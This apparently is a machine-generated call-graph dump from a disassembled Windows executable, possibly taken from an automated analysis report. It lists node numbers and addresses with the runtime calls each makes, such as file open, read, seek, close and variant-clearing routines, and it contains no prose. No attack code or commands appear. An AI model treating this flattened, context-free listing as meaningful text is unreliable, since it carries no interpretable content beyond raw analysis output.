85153 414fff 85642 417f25 10 API calls __tsopen_nolock 85153->85642 85156 414e4e __ftell_nolock 51 API calls 85154->85156 85157 415024 85156->85157 85643 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85157->85643 85159 41500a __tsopen_nolock 85159->85062 85161 414dd6 85160->85161 85162 414deb 85160->85162 85169 417f77 46 API calls __getptd_noexit 85161->85169 85162->85161 85167 414df2 85162->85167 85164 414ddb 85170 417f25 10 API calls __tsopen_nolock 85164->85170 85166 414de6 85166->85114 85167->85166 85171 418f98 77 API calls 6 library calls 85167->85171 85169->85164 85170->85166 85171->85166 85174 414910 __tsopen_nolock 85172->85174 85173 414923 85228 417f77 46 API calls __getptd_noexit 85173->85228 85174->85173 85176 414951 85174->85176 85191 41d4d1 85176->85191 85177 414928 85229 417f25 10 API calls __tsopen_nolock 85177->85229 85180 414956 85181 41496a 85180->85181 85182 41495d 85180->85182 85184 414992 85181->85184 85185 414972 85181->85185 85230 417f77 46 API calls __getptd_noexit 85182->85230 85208 41d218 85184->85208 85231 417f77 46 API calls __getptd_noexit 85185->85231 85190 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 85190->85118 85192 41d4dd __tsopen_nolock 85191->85192 85193 4182cb __lock 46 API calls 85192->85193 85194 41d4eb 85193->85194 85195 41d567 85194->85195 85202 418209 __mtinitlocknum 46 API calls 85194->85202 85206 41d560 85194->85206 85236 4154b2 47 API calls __lock 85194->85236 85237 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85194->85237 85196 416b04 __malloc_crt 46 API calls 85195->85196 85198 41d56e 85196->85198 85199 41d57c InitializeCriticalSectionAndSpinCount 85198->85199 85198->85206 85200 41d59c 85199->85200 85201 41d5af EnterCriticalSection 85199->85201 85205 413748 _free 46 API calls 85200->85205 85201->85206 85202->85194 85204 41d5f0 __tsopen_nolock 85204->85180 85205->85206 85233 41d5fb 85206->85233 85209 41d23a 85208->85209 85210 41d255 85209->85210 85222 41d26c __wopenfile 85209->85222 85242 417f77 46 API calls __getptd_noexit 85210->85242 85212 41d421 85215 41d47a 85212->85215 85216 41d48c 85212->85216 85213 41d25a 85243 417f25 10 API calls __tsopen_nolock 85213->85243 85247 417f77 46 API calls __getptd_noexit 85215->85247 85239 422bf9 85216->85239 85219 41d47f 85248 417f25 10 API calls __tsopen_nolock 85219->85248 85220 41499d 85232 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85220->85232 85222->85212 85222->85215 85244 41341f 58 API calls 2 library calls 85222->85244 85224 41d41a 85224->85212 85245 41341f 58 API calls 2 library calls 85224->85245 85226 41d439 85226->85212 85246 41341f 58 API calls 2 library calls 85226->85246 85228->85177 85229->85190 85230->85190 85231->85190 85232->85190 85238 4181f2 LeaveCriticalSection 85233->85238 85235 41d602 85235->85204 85236->85194 85237->85194 85238->85235 85249 422b35 85239->85249 85241 422c14 85241->85220 85242->85213 85243->85220 85244->85224 85245->85226 85246->85212 85247->85219 85248->85220 85251 422b41 __tsopen_nolock 85249->85251 85250 422b54 85252 417f77 __tsopen_nolock 46 API calls 85250->85252 85251->85250 85253 422b8a 85251->85253 85254 422b59 85252->85254 85255 422400 __tsopen_nolock 109 API calls 85253->85255 85256 417f25 __tsopen_nolock 10 API calls 85254->85256 85257 422ba4 85255->85257 85259 422b63 __tsopen_nolock 85256->85259 85258 422bcb __wsopen_helper LeaveCriticalSection 85257->85258 85258->85259 85259->85241 85263 4150dd __tsopen_nolock 85260->85263 85261 4150e9 85291 417f77 46 API calls __getptd_noexit 85261->85291 85263->85261 85264 41510f 85263->85264 85273 415471 85264->85273 85265 4150ee 85292 417f25 10 API calls __tsopen_nolock 85265->85292 85272 4150f9 __tsopen_nolock 85272->85120 85274 415483 85273->85274 85275 4154a5 EnterCriticalSection 85273->85275 85274->85275 85276 41548b 85274->85276 85277 415117 85275->85277 85278 4182cb __lock 46 API calls 85276->85278 85279 415047 85277->85279 85278->85277 85280 415067 85279->85280 85281 415057 85279->85281 85286 415079 85280->85286 85294 414e4e 85280->85294 85349 417f77 46 API calls __getptd_noexit 85281->85349 85285 41505c 85293 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85285->85293 85311 41443c 85286->85311 85289 4150b9 85324 41e1f4 85289->85324 85291->85265 85292->85272 85293->85272 85295 414e61 85294->85295 85296 414e79 85294->85296 85350 417f77 46 API calls __getptd_noexit 85295->85350 85298 414139 __fflush_nolock 46 API calls 85296->85298 85300 414e80 85298->85300 85299 414e66 85351 417f25 10 API calls __tsopen_nolock 85299->85351 85302 41e1f4 __write 51 API calls 85300->85302 85303 414e97 85302->85303 85304 414f09 85303->85304 85306 414ec9 85303->85306 85310 414e71 85303->85310 85352 417f77 46 API calls __getptd_noexit 85304->85352 85307 41e1f4 __write 51 API calls 85306->85307 85306->85310 85308 414f64 85307->85308 85309 41e1f4 __write 51 API calls 85308->85309 85308->85310 85309->85310 85310->85286 85312 414455 85311->85312 85316 414477 85311->85316 85313 414139 __fflush_nolock 46 API calls 85312->85313 85312->85316 85314 414470 85313->85314 85353 41b7b2 77 API calls 4 library calls 85314->85353 85317 414139 85316->85317 85318 414145 85317->85318 85319 41415a 85317->85319 85354 417f77 46 API calls __getptd_noexit 85318->85354 85319->85289 85321 41414a 85355 417f25 10 API calls __tsopen_nolock 85321->85355 85323 414155 85323->85289 85325 41e200 __tsopen_nolock 85324->85325 85326 41e208 85325->85326 85330 41e223 85325->85330 85376 417f8a 46 API calls __getptd_noexit 85326->85376 85328 41e22f 85378 417f8a 46 API calls __getptd_noexit 85328->85378 85329 41e20d 85377 417f77 46 API calls __getptd_noexit 85329->85377 85330->85328 85333 41e269 85330->85333 85332 41e234 85379 417f77 46 API calls __getptd_noexit 85332->85379 85356 41ae56 85333->85356 85337 41e23c 85380 417f25 10 API calls __tsopen_nolock 85337->85380 85338 41e26f 85340 41e291 85338->85340 85341 41e27d 85338->85341 85381 417f77 46 API calls __getptd_noexit 85340->85381 85366 41e17f 85341->85366 85342 41e215 __tsopen_nolock 85342->85285 85345 41e289 85383 41e2c0 LeaveCriticalSection __unlock_fhandle 85345->85383 85346 41e296 85382 417f8a 46 API calls __getptd_noexit 85346->85382 85349->85285 85350->85299 85351->85310 85352->85310 85353->85316 85354->85321 85355->85323 85357 41ae62 __tsopen_nolock 85356->85357 85358 41aebc 85357->85358 85361 4182cb __lock 46 API calls 85357->85361 85359 41aec1 EnterCriticalSection 85358->85359 85360 41aede __tsopen_nolock 85358->85360 85359->85360 85360->85338 85362 41ae8e 85361->85362 85363 41aeaa 85362->85363 85364 41ae97 InitializeCriticalSectionAndSpinCount 85362->85364 85365 41aeec ___lock_fhandle LeaveCriticalSection 85363->85365 85364->85363 85365->85358 85367 41aded __lseek_nolock 46 API calls 85366->85367 85368 41e18e 85367->85368 85369 41e1a4 SetFilePointer 85368->85369 85370 41e194 85368->85370 85372 41e1bb GetLastError 85369->85372 85374 41e1c3 85369->85374 85371 417f77 __tsopen_nolock 46 API calls 85370->85371 85373 41e199 85371->85373 85372->85374 85373->85345 85374->85373 85375 417f9d __dosmaperr 46 API calls 85374->85375 85375->85373 85376->85329 85377->85342 85378->85332 85379->85337 85380->85342 85381->85346 85382->85345 85383->85342 85385 4149ea 85384->85385 85386 4149fe 85384->85386 85430 417f77 46 API calls __getptd_noexit 85385->85430 85389 41443c __flush 77 API calls 85386->85389 85392 4149fa 85386->85392 85388 4149ef 85431 417f25 10 API calls __tsopen_nolock 85388->85431 85391 414a0a 85389->85391 85403 41d8c2 85391->85403 85402 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85392->85402 85395 414139 __fflush_nolock 46 API calls 85396 414a18 85395->85396 85407 41d7fe 85396->85407 85398 414a1e 85398->85392 85399 413748 _free 46 API calls 85398->85399 85399->85392 85400->85134 85401->85137 85402->85137 85404 414a12 85403->85404 85405 41d8d2 85403->85405 85404->85395 85405->85404 85406 413748 _free 46 API calls 85405->85406 85406->85404 85408 41d80a __tsopen_nolock 85407->85408 85409 41d812 85408->85409 85413 41d82d 85408->85413 85447 417f8a 46 API calls __getptd_noexit 85409->85447 85411 41d839 85449 417f8a 46 API calls __getptd_noexit 85411->85449 85412 41d817 85448 417f77 46 API calls __getptd_noexit 85412->85448 85413->85411 85415 41d873 85413->85415 85418 41ae56 ___lock_fhandle 48 API calls 85415->85418 85417 41d83e 85450 417f77 46 API calls __getptd_noexit 85417->85450 85420 41d879 85418->85420 85423 41d893 85420->85423 85424 41d887 85420->85424 85421 41d846 85451 417f25 10 API calls __tsopen_nolock 85421->85451 85452 417f77 46 API calls __getptd_noexit 85423->85452 85432 41d762 85424->85432 85425 41d81f __tsopen_nolock 85425->85398 85428 41d88d 85453 41d8ba LeaveCriticalSection __unlock_fhandle 85428->85453 85430->85388 85431->85392 85454 41aded 85432->85454 85434 41d7c8 85467 41ad67 47 API calls __tsopen_nolock 85434->85467 85436 41d772 85436->85434 85437 41aded __lseek_nolock 46 API calls 85436->85437 85446 41d7a6 85436->85446 85441 41d79d 85437->85441 85438 41aded __lseek_nolock 46 API calls 85439 41d7b2 CloseHandle 85438->85439 85439->85434 85442 41d7be GetLastError 85439->85442 85440 41d7d0 85444 41d7f2 85440->85444 85468 417f9d 46 API calls 2 library calls 85440->85468 85445 41aded __lseek_nolock 46 API calls 85441->85445 85442->85434 85444->85428 85445->85446 85446->85434 85446->85438 85447->85412 85448->85425 85449->85417 85450->85421 85451->85425 85452->85428 85453->85425 85455 41ae12 85454->85455 85456 41adfa 85454->85456 85459 417f8a __tsopen_nolock 46 API calls 85455->85459 85462 41ae51 85455->85462 85457 417f8a __tsopen_nolock 46 API calls 85456->85457 85458 41adff 85457->85458 85460 417f77 __tsopen_nolock 46 API calls 85458->85460 85461 41ae23 85459->85461 85463 41ae07 85460->85463 85464 417f77 __tsopen_nolock 46 API calls 85461->85464 85462->85436 85463->85436 85465 41ae2b 85464->85465 85466 417f25 __tsopen_nolock 10 API calls 85465->85466 85466->85463 85467->85440 85468->85444 85470 414c82 __tsopen_nolock 85469->85470 85471 414cc3 85470->85471 85472 414cbb __tsopen_nolock 85470->85472 85475 414c96 __cftoa_l 85470->85475 85473 415471 __lock_file 47 API calls 85471->85473 85472->85143 85474 414ccb 85473->85474 85482 414aba 85474->85482 85496 417f77 46 API calls __getptd_noexit 85475->85496 85477 414cb0 85497 417f25 10 API calls __tsopen_nolock 85477->85497 85486 414ad8 __cftoa_l 85482->85486 85489 414af2 85482->85489 85483 414ae2 85549 417f77 46 API calls __getptd_noexit 85483->85549 85485 414ae7 85550 417f25 10 API calls __tsopen_nolock 85485->85550 85486->85483 85486->85489 85493 414b2d 85486->85493 85498 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85489->85498 85490 414c38 __cftoa_l 85552 417f77 46 API calls __getptd_noexit 85490->85552 85492 414139 __fflush_nolock 46 API calls 85492->85493 85493->85489 85493->85490 85493->85492 85499 41dfcc 85493->85499 85529 41d8f3 85493->85529 85551 41e0c2 46 API calls 3 library calls 85493->85551 85496->85477 85497->85472 85498->85472 85500 41dfd8 __tsopen_nolock 85499->85500 85501 41dfe0 85500->85501 85502 41dffb 85500->85502 85622 417f8a 46 API calls __getptd_noexit 85501->85622 85504 41e007 85502->85504 85507 41e041 85502->85507 85624 417f8a 46 API calls __getptd_noexit 85504->85624 85505 41dfe5 85623 417f77 46 API calls __getptd_noexit 85505->85623 85510 41e063 85507->85510 85511 41e04e 85507->85511 85509 41e00c 85625 417f77 46 API calls __getptd_noexit 85509->85625 85514 41ae56 ___lock_fhandle 48 API calls 85510->85514 85627 417f8a 46 API calls __getptd_noexit 85511->85627 85517 41e069 85514->85517 85515 41e014 85626 417f25 10 API calls __tsopen_nolock 85515->85626 85516 41e053 85628 417f77 46 API calls __getptd_noexit 85516->85628 85519 41e077 85517->85519 85520 41e08b 85517->85520 85553 41da15 85519->85553 85629 417f77 46 API calls __getptd_noexit 85520->85629 85522 41dfed __tsopen_nolock 85522->85493 85525 41e083 85631 41e0ba LeaveCriticalSection __unlock_fhandle 85525->85631 85526 41e090 85630 417f8a 46 API calls __getptd_noexit 85526->85630 85530 41d900 85529->85530 85534 41d915 85529->85534 85635 417f77 46 API calls __getptd_noexit 85530->85635 85532 41d905 85636 417f25 10 API calls __tsopen_nolock 85532->85636 85535 41d94a 85534->85535 85540 41d910 85534->85540 85632 420603 85534->85632 85537 414139 __fflush_nolock 46 API calls 85535->85537 85538 41d95e 85537->85538 85539 41dfcc __read 59 API calls 85538->85539 85541 41d965 85539->85541 85540->85493 85541->85540 85542 414139 __fflush_nolock 46 API calls 85541->85542 85543 41d988 85542->85543 85543->85540 85544 414139 __fflush_nolock 46 API calls 85543->85544 85545 41d994 85544->85545 85545->85540 85546 414139 __fflush_nolock 46 API calls 85545->85546 85547 41d9a1 85546->85547 85548 414139 __fflush_nolock 46 API calls 85547->85548 85548->85540 85549->85485 85550->85489 85551->85493 85552->85485 85554 41da31 85553->85554 85555 41da4c 85553->85555 85556 417f8a __tsopen_nolock 46 API calls 85554->85556 85557 41da5b 85555->85557 85559 41da7a 85555->85559 85558 41da36 85556->85558 85560 417f8a __tsopen_nolock 46 API calls 85557->85560 85562 417f77 __tsopen_nolock 46 API calls 85558->85562 85561 41da98 85559->85561 85576 41daac 85559->85576 85563 41da60 85560->85563 85564 417f8a __tsopen_nolock 46 API calls 85561->85564 85573 41da3e 85562->85573 85566 417f77 __tsopen_nolock 46 API calls 85563->85566 85568 41da9d 85564->85568 85565 41db02 85567 417f8a __tsopen_nolock 46 API calls 85565->85567 85569 41da67 85566->85569 85570 41db07 85567->85570 85571 417f77 __tsopen_nolock 46 API calls 85568->85571 85572 417f25 __tsopen_nolock 10 API calls 85569->85572 85574 417f77 __tsopen_nolock 46 API calls 85570->85574 85575 41daa4 85571->85575 85572->85573 85573->85525 85574->85575 85579 417f25 __tsopen_nolock 10 API calls 85575->85579 85576->85565 85576->85573 85577 41dae1 85576->85577 85578 41db1b 85576->85578 85577->85565 85584 41daec ReadFile 85577->85584 85581 416b04 __malloc_crt 46 API calls 85578->85581 85579->85573 85585 41db31 85581->85585 85582 41dc17 85583 41df8f GetLastError 85582->85583 85590 41dc2b 85582->85590 85586 41de16 85583->85586 85587 41df9c 85583->85587 85584->85582 85584->85583 85588 41db59 85585->85588 85589 41db3b 85585->85589 85594 417f9d __dosmaperr 46 API calls 85586->85594 85603 41dd9b 85586->85603 85592 417f77 __tsopen_nolock 46 API calls 85587->85592 85591 420494 __lseeki64_nolock 48 API calls 85588->85591 85593 417f77 __tsopen_nolock 46 API calls 85589->85593 85602 41de5b 85590->85602 85590->85603 85605 41dc47 85590->85605 85596 41db67 85591->85596 85597 41dfa1 85592->85597 85595 41db40 85593->85595 85594->85603 85598 417f8a __tsopen_nolock 46 API calls 85595->85598 85596->85584 85599 417f8a __tsopen_nolock 46 API calls 85597->85599 85598->85573 85599->85603 85600 413748 _free 46 API calls 85600->85573 85601 41dd28 85601->85603 85612 41dda3 85601->85612 85613 41dd96 85601->85613 85619 41dd60 85601->85619 85602->85603 85604 41ded0 ReadFile 85602->85604 85603->85573 85603->85600 85609 41deef GetLastError 85604->85609 85615 41def9 85604->85615 85605->85601 85606 41dcab ReadFile 85605->85606 85607 41dcd3 85606->85607 85608 41dcc9 GetLastError 85606->85608 85607->85605 85618 420494 __lseeki64_nolock 48 API calls 85607->85618 85608->85605 85608->85607 85609->85602 85609->85615 85610 41ddec MultiByteToWideChar 85610->85603 85611 41de10 GetLastError 85610->85611 85611->85586 85617 41ddda 85612->85617 85612->85619 85614 417f77 __tsopen_nolock 46 API calls 85613->85614 85614->85603 85615->85602 85616 420494 __lseeki64_nolock 48 API calls 85615->85616 85616->85615 85620 420494 __lseeki64_nolock 48 API calls 85617->85620 85618->85607 85619->85610 85621 41dde9 85620->85621 85621->85610 85622->85505 85623->85522 85624->85509 85625->85515 85626->85522 85627->85516 85628->85515 85629->85526 85630->85525 85631->85522 85633 416b04 __malloc_crt 46 API calls 85632->85633 85634 420618 85633->85634 85634->85535 85635->85532 85636->85540 85640 4148b3 GetSystemTimeAsFileTime __aulldiv 85637->85640 85639 442c6b 85639->85146 85640->85639 85641->85153 85642->85159 85643->85159 85647 45272f __tzset_nolock _wcscpy 85644->85647 85645 44afef GetSystemTimeAsFileTime 85645->85647 85646 4528a4 85646->85068 85646->85069 85647->85645 85647->85646 85648 414d04 61 API calls __fread_nolock 85647->85648 85649 4150d1 81 API calls _fseek 85647->85649 85648->85647 85649->85647 85651 44b1bc 85650->85651 85652 44b1ca 85650->85652 85653 4149c2 116 API calls 85651->85653 85654 44b1e1 85652->85654 85655 4149c2 116 API calls 85652->85655 85656 44b1d8 85652->85656 85653->85652 85685 4321a4 85654->85685 85657 44b2db 85655->85657 85656->85097 85657->85654 85659 44b2e9 85657->85659 85661 44b2f6 85659->85661 85664 414a46 __fcloseall 82 API calls 85659->85664 85660 44b224 85662 44b253 85660->85662 85663 44b228 85660->85663 85661->85097 85689 43213d 85662->85689 85666 44b235 85663->85666 85669 414a46 __fcloseall 82 API calls 85663->85669 85664->85661 85667 44b245 85666->85667 85670 414a46 __fcloseall 82 API calls 85666->85670 85667->85097 85668 44b25a 85671 44b260 85668->85671 85672 44b289 85668->85672 85669->85666 85670->85667 85674 44b26d 85671->85674 85676 414a46 __fcloseall 82 API calls 85671->85676 85699 44b0bf 87 API calls 85672->85699 85677 44b27d 85674->85677 85679 414a46 __fcloseall 82 API calls 85674->85679 85675 44b28f 85700 4320f8 46 API calls _free 85675->85700 85676->85674 85677->85097 85679->85677 85680 44b295 85681 44b2a2 85680->85681 85682 414a46 __fcloseall 82 API calls 85680->85682 85683 44b2b2 85681->85683 85684 414a46 __fcloseall 82 API calls 85681->85684 85682->85681 85683->85097 85684->85683 85686 4321cb 85685->85686 85688 4321b4 __tzset_nolock _memmove 85685->85688 85687 414d04 __fread_nolock 61 API calls 85686->85687 85687->85688 85688->85660 85690 4135bb _malloc 46 API calls 85689->85690 85691 432150 85690->85691 85692 4135bb _malloc 46 API calls 85691->85692 85693 432162 85692->85693 85694 4135bb _malloc 46 API calls 85693->85694 85695 432174 85694->85695 85697 432189 85695->85697 85701 4320f8 46 API calls _free 85695->85701 85697->85668 85698 432198 85698->85668 85699->85675 85700->85680 85701->85698 85702->84998 85703->84999 85704->85019 85705->85019 85706->85019 85707->85010 85708->85019 85709->85019 85710->85023 85711->85032 85712->85034 85713->85034 85763 410160 85714->85763 85716 41012f GetFullPathNameW 85717 410147 ctype 85716->85717 85717->84854 85719 4102cb SHGetDesktopFolder 85718->85719 85722 410333 _wcsncpy 85718->85722 85720 4102e0 _wcsncpy 85719->85720 85719->85722 85721 41031c SHGetPathFromIDListW 85720->85721 85720->85722 85721->85722 85722->84857 85724 4101bb 85723->85724 85728 425f4a 85723->85728 85725 410160 52 API calls 85724->85725 85727 4101c7 85725->85727 85726 4114ab __wcsicoll 58 API calls 85726->85728 85767 410200 52 API calls 2 library calls 85727->85767 85728->85726 85730 425f6e 85728->85730 85730->84859 85731 4101d6 85768 410200 52 API calls 2 library calls 85731->85768 85733 4101e9 85733->84859 85735 40f760 126 API calls 85734->85735 85736 40f584 85735->85736 85737 429335 85736->85737 85738 40f58c 85736->85738 85741 4528bd 118 API calls 85737->85741 85739 40f598 85738->85739 85740 429358 85738->85740 85793 4033c0 113 API calls 7 library calls 85739->85793 85794 434034 86 API calls _wprintf 85740->85794 85744 42934b 85741->85744 85747 429373 85744->85747 85748 42934f 85744->85748 85745 429369 85745->85747 85746 40f5b4 85746->84855 85749 4115d7 52 API calls 85747->85749 85750 431e58 82 API calls 85748->85750 85762 4293c5 ctype 85749->85762 85750->85740 85751 42959c 85752 413748 _free 46 API calls 85751->85752 85753 4295a5 85752->85753 85754 431e58 82 API calls 85753->85754 85755 4295b1 85754->85755 85759 401b10 52 API calls 85759->85762 85762->85751 85762->85759 85769 444af8 85762->85769 85772 44b41c 85762->85772 85779 402780 85762->85779 85787 4022d0 85762->85787 85795 44c7dd 64 API calls 3 library calls 85762->85795 85764 410167 _wcslen 85763->85764 85765 4115d7 52 API calls 85764->85765 85766 41017e _wcscpy 85765->85766 85766->85716 85767->85731 85768->85733 85770 4115d7 52 API calls 85769->85770 85771 444b27 _memmove 85770->85771 85771->85762 85773 44b429 85772->85773 85774 4115d7 52 API calls 85773->85774 85775 44b440 85774->85775 85776 44b45e 85775->85776 85777 401b10 52 API calls 85775->85777 85776->85762 85778 44b453 85777->85778 85778->85762 85781 402827 85779->85781 85785 402790 ctype _memmove 85779->85785 85780 4115d7 52 API calls 85783 402797 85780->85783 85782 4115d7 52 API calls 85781->85782 85782->85785 85784 4115d7 52 API calls 85783->85784 85786 4027bd 85783->85786 85784->85786 85785->85780 85786->85762 85788 4022e0 85787->85788 85791 40239d 85787->85791 85789 4115d7 52 API calls 85788->85789 85790 402320 ctype 85788->85790 85788->85791 85789->85790 85790->85791 85792 4115d7 52 API calls 85790->85792 85791->85762 85792->85790 85793->85746 85794->85745 85795->85762 85797 402539 ctype 85796->85797 85798 402417 85796->85798 85797->84863 85798->85797 85799 4115d7 52 API calls 85798->85799 85800 402443 85799->85800 85801 4115d7 52 API calls 85800->85801 85802 4024b4 85801->85802 85802->85797 85804 4022d0 52 API calls 85802->85804 85825 402880 85802->85825 85804->85802 85809 401566 85805->85809 85806 401794 85876 40e9a0 90 API calls 85806->85876 85809->85806 85811 40167a 85809->85811 85812 4010a0 52 API calls 85809->85812 85810 4017c0 85810->84866 85811->85810 85877 45e737 90 API calls 3 library calls 85811->85877 85812->85809 85814 40bc70 52 API calls 85813->85814 85819 40d451 85814->85819 85815 40d50f 85880 410600 52 API calls 85815->85880 85817 40d519 85817->84868 85818 40e0a0 52 API calls 85818->85819 85819->85815 85819->85817 85819->85818 85821 401b10 52 API calls 85819->85821 85823 427c01 85819->85823 85878 40f310 53 API calls 85819->85878 85879 40d860 91 API calls 85819->85879 85821->85819 85881 45e737 90 API calls 3 library calls 85823->85881 85826 4115d7 52 API calls 85825->85826 85827 4028b3 85826->85827 85828 4115d7 52 API calls 85827->85828 85866 4028c5 ctype _memmove 85828->85866 85829 402780 52 API calls 85864 402b1e ctype 85829->85864 85830 427d62 85834 403350 52 API calls 85830->85834 85832 402bb6 85868 403060 53 API calls 85832->85868 85833 402aeb ctype 85833->85829 85837 42802b ctype 85833->85837 85841 427d6b 85834->85841 85836 402bca 85838 427f63 85836->85838 85839 402bd4 85836->85839 85873 460879 92 API calls 3 library calls 85838->85873 85843 402780 52 API calls 85839->85843 85840 403350 52 API calls 85840->85866 85847 427f2c 85841->85847 85871 403020 52 API calls _memmove 85841->85871 85845 402bdf 85843->85845 85845->85802 85846 427fd5 85874 460879 92 API calls 3 library calls 85846->85874 85872 460879 92 API calls 3 library calls 85847->85872 85851 402780 52 API calls 85851->85866 85852 402f00 52 API calls 85852->85866 85853 4013a0 52 API calls 85853->85866 85854 427fe4 85863 402780 52 API calls 85854->85863 85855 427fa5 85859 402780 52 API calls 85855->85859 85856 428000 85875 460879 92 API calls 3 library calls 85856->85875 85857 4026f0 52 API calls 85862 402a85 CharUpperBuffW 85857->85862 85859->85864 85861 427f48 85861->85864 85862->85866 85863->85861 85864->85802 85865 4115d7 52 API calls 85865->85866 85866->85830 85866->85832 85866->85833 85866->85840 85866->85846 85866->85847 85866->85851 85866->85852 85866->85853 85866->85855 85866->85856 85866->85857 85866->85865 85867 4031b0 63 API calls 85866->85867 85869 402f80 92 API calls _memmove 85866->85869 85870 402280 52 API calls 85866->85870 85867->85866 85868->85836 85869->85866 85870->85866 85871->85841 85872->85861 85873->85861 85874->85854 85875->85864 85876->85811 85877->85810 85878->85819 85879->85819 85880->85817 85881->85817 85882->84881 85883->84882 85885 42c5fe 85884->85885 85900 4091c6 85884->85900 85886 40bc70 52 API calls 85885->85886 85885->85900 85887 42c64e InterlockedIncrement 85886->85887 85888 42c665 85887->85888 85893 42c697 85887->85893 85890 42c672 InterlockedDecrement Sleep InterlockedIncrement 85888->85890 85888->85893 85889 42c737 InterlockedDecrement 85891 42c74a 85889->85891 85890->85888 85890->85893 85894 408f40 VariantClear 85891->85894 85892 42c731 85892->85889 85893->85889 85893->85892 86168 408e80 VariantClear 85893->86168 85896 42c752 85894->85896 86178 410c60 VariantClear ctype 85896->86178 85897 42c6cf 86169 45340c 85897->86169 85900->84943 85901 42c6db 85902 402160 52 API calls 85901->85902 85903 42c6e5 85902->85903 85904 45340c 85 API calls 85903->85904 85905 42c6f1 85904->85905 86175 40d200 52 API calls 2 library calls 85905->86175 85907 42c6fb 86176 465124 53 API calls 85907->86176 85909 42c715 85910 42c76a 85909->85910 85911 42c719 85909->85911 85912 401b10 52 API calls 85910->85912 86177 46fe32 VariantClear 85911->86177 85914 42c77e 85912->85914 85915 401980 53 API calls 85914->85915 85920 42c796 85915->85920 85916 42c812 86180 46fe32 VariantClear 85916->86180 85918 42c82a InterlockedDecrement 86181 46ff07 54 API calls 85918->86181 85920->85916 85922 42c864 85920->85922 86179 40ba10 52 API calls 2 library calls 85920->86179 85921 42c849 85924 42c9ec 85921->85924 85930 408f40 VariantClear 85921->85930 85936 402780 52 API calls 85921->85936 85939 401980 53 API calls 85921->85939 86184 40a780 85921->86184 86182 45e737 90 API calls 3 library calls 85922->86182 86225 47d33e 338 API calls 85924->86225 85927 42c9fe 86226 46feb1 VariantClear VariantClear 85927->86226 85929 42c874 85932 408f40 VariantClear 85929->85932 85941 42ca59 85929->85941 85930->85921 85931 42ca08 85933 401b10 52 API calls 85931->85933 85935 42c891 85932->85935 86183 410c60 VariantClear ctype 85935->86183 85936->85921 85939->85921 85941->85941 85943 40afc4 85942->85943 85944 40b156 85942->85944 85945 40afd5 85943->85945 85946 42d1e3 85943->85946 86237 45e737 90 API calls 3 library calls 85944->86237 85950 40a780 201 API calls 85945->85950 85967 40b11a ctype 85945->85967 86238 45e737 90 API calls 3 library calls 85946->86238 85949 40b143 85949->84943 85953 40b00a 85950->85953 85951 42d1f8 85955 408f40 VariantClear 85951->85955 85953->85951 85956 40b012 85953->85956 85954 42d4db 85954->85954 85955->85949 85957 40b04a 85956->85957 85958 42d231 VariantClear 85956->85958 85965 40b094 ctype 85956->85965 85961 40b05c ctype 85957->85961 86239 40e270 VariantClear ctype 85957->86239 85958->85961 85959 42d45a VariantClear 85959->85967 85964 4115d7 52 API calls 85961->85964 85961->85965 85962 40b108 85962->85967 86240 40e270 VariantClear ctype 85962->86240 85964->85965 85965->85962 85966 42d425 ctype 85965->85966 85966->85959 85966->85967 85967->85949 86241 45e737 90 API calls 3 library calls 85967->86241 85969 408fff 85968->85969 85973 40900d 85968->85973 86242 403ea0 52 API calls __cinit 85969->86242 85972 42c3f6 86246 45e737 90 API calls 3 library calls 85972->86246 85973->85972 85975 40a780 201 API calls 85973->85975 85976 42c44a 85973->85976 85979 42c47b 85973->85979 85980 42c4cb 85973->85980 85981 42c564 85973->85981 85984 42c548 85973->85984 85988 409112 85973->85988 85990 42c528 85973->85990 85992 4090df 85973->85992 85993 4090ea 85973->85993 86002 4090f2 ctype 85973->86002 86245 4534e3 52 API calls 85973->86245 86247 40c4e0 201 API calls 85973->86247 85975->85973 86248 45e737 90 API calls 3 library calls 85976->86248 86249 451b42 61 API calls 85979->86249 86251 47faae 240 API calls 85980->86251 85985 408f40 VariantClear 85981->85985 86254 45e737 90 API calls 3 library calls 85984->86254 85985->86002 85986 42c491 85986->86002 86250 45e737 90 API calls 3 library calls 85986->86250 85987 42c4da 85987->86002 86252 45e737 90 API calls 3 library calls 85987->86252 85988->85984 85995 40912b 85988->85995 86253 45e737 90 API calls 3 library calls 85990->86253 85992->85993 86243 408e80 VariantClear 85992->86243 85998 408f40 VariantClear 85993->85998 85995->86002 86244 403e10 53 API calls 85995->86244 85998->86002 86000 40914b 86001 408f40 VariantClear 86000->86001 86001->86002 86002->84943 86255 408d90 86003->86255 86005 429778 86284 410c60 VariantClear ctype 86005->86284 86007 429780 86008 408cf9 86008->86005 86009 42976c 86008->86009 86011 408d2d 86008->86011 86283 45e737 90 API calls 3 library calls 86009->86283 86271 403d10 86011->86271 86014 408d71 ctype 86014->84943 86015 408f40 VariantClear 86016 408d45 ctype 86015->86016 86016->86014 86016->86015 86018 4096c6 _wcslen 86017->86018 86019 4115d7 52 API calls 86018->86019 86082 40a70c ctype _memmove 86018->86082 86020 4096fa _memmove 86019->86020 86022 4115d7 52 API calls 86020->86022 86021 4013a0 52 API calls 86023 4297aa 86021->86023 86024 40971b 86022->86024 86026 4115d7 52 API calls 86023->86026 86025 409749 CharUpperBuffW 86024->86025 86028 40976a ctype 86024->86028 86024->86082 86025->86028 86067 4297d1 _memmove 86026->86067 86074 4097e5 ctype 86028->86074 86575 47dcbb 203 API calls 86028->86575 86030 408f40 VariantClear 86031 42ae92 86030->86031 86604 410c60 VariantClear ctype 86031->86604 86033 42aea4 86034 409aa2 86036 4115d7 52 API calls 86034->86036 86041 409afe 86034->86041 86034->86067 86035 40a689 86038 4115d7 52 API calls 86035->86038 86036->86041 86037 4115d7 52 API calls 86037->86074 86055 40a6af ctype _memmove 86038->86055 86039 409b2a 86043 429dbe 86039->86043 86104 409b4d ctype _memmove 86039->86104 86583 40b400 VariantClear VariantClear ctype 86039->86583 86040 40c2c0 52 API calls 86040->86074 86041->86039 86042 4115d7 52 API calls 86041->86042 86044 429d31 86042->86044 86049 429dd3 86043->86049 86584 40b400 VariantClear VariantClear ctype 86043->86584 86048 429d42 86044->86048 86580 44a801 52 API calls 86044->86580 86045 429a46 VariantClear 86045->86074 86046 409fd2 86053 40a045 86046->86053 86106 42a3f5 86046->86106 86059 40e0a0 52 API calls 86048->86059 86049->86104 86585 40e1c0 VariantClear ctype 